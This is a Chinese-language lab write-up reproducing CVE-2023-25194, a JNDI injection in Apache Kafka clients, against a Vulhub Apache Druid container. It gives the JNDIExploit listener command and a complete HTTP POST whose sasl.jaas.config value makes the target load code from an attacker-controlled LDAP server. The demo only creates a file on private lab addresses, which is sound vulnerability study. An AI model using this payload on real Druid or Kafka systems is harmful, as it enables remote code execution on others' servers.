Apache Kafka Clients JNDI注入漏洞 (CVE-2023-25194)
Apache Kafka是一个开源分布式消息队列,Kafka clients是相对应的Java客户端。
在版本3.3.2及以前,Apache Kafka clients中存在一处JNDI注入漏洞。如果攻击者在连接的时候可以控制属性sasl.jaas.config
的值为com.sun.security.auth.module.JndiLoginModule
,则可以发起JNDI连接,进而导致JNDI注入漏洞,执行任意命令。
漏洞复现
靶机Ubuntu:192.168.126.128
攻击机kali:192.168.126.130
cd vulhub/
cd kafka/
cd CVE-2023-25194/
docker-compose up -d
访问http://your-ip:8888
即可查看到Apache Druid主页。
攻击准备
启动kali:192.168.126.130
JNDIExploit下载:https://github.com/WhiteHSBG/JNDIExploit/releases/tag/v1.4
1.开启JNDIExpolit监听:java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.126.130
2.使用ldap://roguo-jndi-server:1389/Basic/Command/Base64/[base64_encoded_cmd]
进行攻击
要执行的命令touch /tmp/lm_hacker
base64编码后为dG91Y2ggL3RtcC9sbV9oYWNrZXI=
构造payload:ldap://192.168.126.130:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9sbV9oYWNrZXI=
3.启动burpsuite抓包
构造并将payload放入如下请求:
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 192.168.126.128:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 1792
{
"type":"kafka",
"spec":{
"type":"kafka",
"ioConfig":{
"type":"kafka",
"consumerProperties":{
"bootstrap.servers":"127.0.0.1:6666",
"sasl.mechanism":"SCRAM-SHA-256",
"security.protocol":"SASL_SSL",
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://192.168.126.130:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9sbV9oYWNrZXI=\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
},
"topic":"test",
"useEarliestOffset":true,
"inputFormat":{
"type":"regex",
"pattern":"([\\s\\S]*)",
"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
"columns":[
"raw"
]
}
},
"dataSchema":{
"dataSource":"sample",
"timestampSpec":{
"column":"!!!_no_such_column_!!!",
"missingValue":"1970-01-01T00:00:00Z"
},
"dimensionsSpec":{
},
"granularitySpec":{
"rollup":false
}
},
"tuningConfig":{
"type":"kafka"
}
},
"samplerConfig":{
"numRows":500,
"timeoutMs":15000
}
}
发送数据包,回到靶机,进入漏洞目录下docker-compose exec web bash
可以看到lm_hacker文件被成功创建(hacker是测试过的)